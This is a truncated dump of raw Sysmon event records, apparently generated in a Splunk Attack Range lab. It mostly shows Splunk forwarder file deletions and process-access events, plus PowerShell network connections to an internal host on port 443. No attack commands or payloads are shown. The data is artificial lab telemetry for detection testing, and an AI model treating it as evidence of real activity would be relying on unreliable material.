Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B2E0C86DA5CE8508200C0D83C57D180,SHA256=875156F898C0157205CC8760902E544678B5C3D222EE2AA320A2C1700C90CB58,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497737Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:03.385{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07943A8BA48EDF7421CB44A4B813FC78,SHA256=90F9100DBBAC4CC5A283794931FE037F143D4D956D2803B8CAA198D706282A00,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497738Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:04.399{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EA9C6BA0535818503DFD9B0625B3257,SHA256=24557C3F2A29E6BECB3A2DA63BA3820AFE01DB72462804668D3BFFAE922A7AE1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497740Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:05.721{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DBAE33841C52C1D56EEDA76383F23EAA,SHA256=2F1552829684B7F078EE43FCA98E10A005B6246D61F56B56AA3B1497127220F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497739Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:05.403{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D0BAE5A40CCC9E1EDAF01A70097759F,SHA256=0C9F151088997B522A3FF5635CB24DA8083E4A4BCC79BAB9F74B58363152583E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497742Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:06.431{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF0D1F33E08F2CF47726E619B9E17FFD,SHA256=C48CE3E684E38945FDBE2983EB80A49F975E1C835CD7C57129FD96489E7DA332,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497741Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:36.374{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50573-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000036497752Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:07.962{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A14B-6140-8D56-04000000C801}432C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497751Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:07.962{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497750Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:07.962{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497749Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:07.962{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497748Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:07.962{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497747Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:07.962{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A14B-6140-8D56-04000000C801}432C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497746Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:07.962{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A14B-6140-8D56-04000000C801}432C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497745Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:07.947{B81B27B7-A14B-6140-8D56-04000000C801}432C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497744Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:07.462{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6352AE6A0773722A767D32265F46A49E,SHA256=3B59B9BA6EB63A157BD7B5F5182DBF5BA06D4741F32B236032819E4C140D1D89,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497743Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:36.757{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50574-false10.0.1.12-8000- 23542300x800000000000000036497764Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:08.993{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2A179B79A417E69A3AE4E484E058C20,SHA256=0B5747B28ECDB9FE23BFE8488304D7317E49CF2B7F77295FB3970AEC63681A8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497763Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:08.993{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D576B24BB0E91615013F6EE4582616A9,SHA256=E97CBB4B8CE7EFDF192A9B5D401D53363E63B102107AF70D9D25CB9DFC99C0A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497762Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:08.662{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A14C-6140-8E56-04000000C801}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497761Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:08.662{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497760Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:08.662{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497759Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:08.662{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497758Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:08.662{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497757Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:08.662{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A14C-6140-8E56-04000000C801}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497756Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:08.662{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A14C-6140-8E56-04000000C801}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497755Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:08.647{B81B27B7-A14C-6140-8E56-04000000C801}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497754Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:08.494{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2067F1DE7EB0612134B12D1E1F78DBA5,SHA256=A7B41A9D0ED0DAF8BEC943ED0D398524E550CB1D3BE148CE03A7A792C39E22B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497753Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:08.108{B81B27B7-A14B-6140-8D56-04000000C801}4325132C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497766Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:09.792{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B09552080180D9DA50D303B6B5E7D36A,SHA256=C614296B964AFBC83529DBFAFAD6B01021E30DFD57D4953D8444D2CD92AC8BB0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497765Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:09.561{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2627E1FAA0EE225553D7FD50DE0B598A,SHA256=37A4B916C2913FB59DF8212244D9E168C530E29D2AF8E1FE8A5174BBE4BA558A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497767Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:10.591{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9102519879B6A5F966B0C0D001CE5D61,SHA256=FA958A049C6BB42C183EA001FAEC298E7DA0C22F7733AD2A38729EAE4C2FD724,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497769Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:11.607{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=685ADA0923B058F81585F05E4020E776,SHA256=8AB7C0881402F2C427A06B45954A659EA1DE6588E3FCEBE5BF73218705CE092C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497768Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:40.379{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50575-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497771Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:12.624{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=101528B8832525EC5CFD02ABEFF584D6,SHA256=1BEC8EE9C0CDD34ACB5299384FB86C7D069421FDF7D379ABBC75426C529FD70E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497770Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:41.830{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50576-false10.0.1.12-8000- 23542300x800000000000000036497772Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:13.658{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCE9595B30B68C1799F517AF86A10752,SHA256=4A001221F20398230EFF6DD6867B3C4A037D49E9A5197413E172C5BD826FCCC9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497774Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:14.845{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=130F82D1222F9D142CB7154E58D53E55,SHA256=1E3987FE1F6E4610CEA33F297DA0C610A4F6D45C175A06390E29EB7B20E5BCA5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497773Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:14.676{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 